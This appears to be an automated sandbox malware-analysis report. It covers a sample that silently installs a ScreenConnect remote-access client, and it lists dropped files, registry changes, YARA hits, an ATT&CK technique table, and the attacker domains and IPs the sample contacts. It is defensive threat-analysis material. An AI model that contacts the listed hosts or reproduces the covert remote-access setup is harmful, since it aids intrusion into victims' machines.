                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_003A1807 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_003A1807
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
                  Source: Yara matchFile source: 8.0.ScreenConnect.WindowsClient.exe.2a0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000000.1245194119.00000000002A2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1766358365.000001BCA486A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1325286877.000000000256A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: dfsvc.exe PID: 7148, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 6376, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.ClientService.exe PID: 6924, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exe, type: DROPPED
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 12 Command and Scripting Interpreter | 1 DLL Search Order Hijacking | 1 DLL Search Order Hijacking | 1 Obfuscated Files or Information | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 1 Windows Service | 1 Windows Service | 1 Install Root Certificate | Security Account Manager | 14 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Scheduled Task/Job | 12 Process Injection | 1 Timestomp | NTDS | 41 Security Software Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | 1 Bootkit | 1 Scheduled Task/Job | 1 DLL Side-Loading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | 3 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Search Order Hijacking | Cached Domain Credentials | 41 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Modify Registry | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 41 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 12 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
| Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 Hidden Users | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |
| Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 1 Bootkit | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking |
                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  Behavior Graph ID: 1638477
                  Sample: SecuriteInfo.com.W32.Lolbas...
                  Startdate: 14/03/2025
                  Architecture: WINDOWS
                  Score: 54

                  DNS/IP info: www.qmhelp.top; miledin.mwhelp.site; bg.microsoft.map.fastly.net
                  Signatures: Multi AV Scanner detection for submitted file; .NET source code references suspicious native API functions; Detected potential unwanted application; 2 other signatures

                  SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe 2 (started)
                    dfsvc.exe 125 108 (started)
                      DNS/IP info: www.qmhelp.top 104.21.72.99, 443, 49684, 49686 CLOUDFLARENETUS United States
                      Dropped: C:\...\ScreenConnect.WindowsFileManager.exe, PE32
                      Dropped: C:\Users\...\ScreenConnect.WindowsClient.exe, PE32
                      Dropped: ScreenConnect.WindowsBackstageShell.exe, PE32
                      Dropped: 13 other files (none is malicious)
                      ScreenConnect.WindowsClient.exe 19 11 (started)
                        DNS/IP info: miledin.mwhelp.site 62.182.86.171, 49714, 8880 YANINA-ASUA Ukraine
                        Signature: Contains functionality to hide user accounts
                        ScreenConnect.ClientService.exe 2 2 (started)
                          Signatures: Contains functionality to hide user accounts; Reads the Security eventlog; Reads the System eventlog
                          WerFault.exe (started)
                    WerFault.exe 22 16 (started)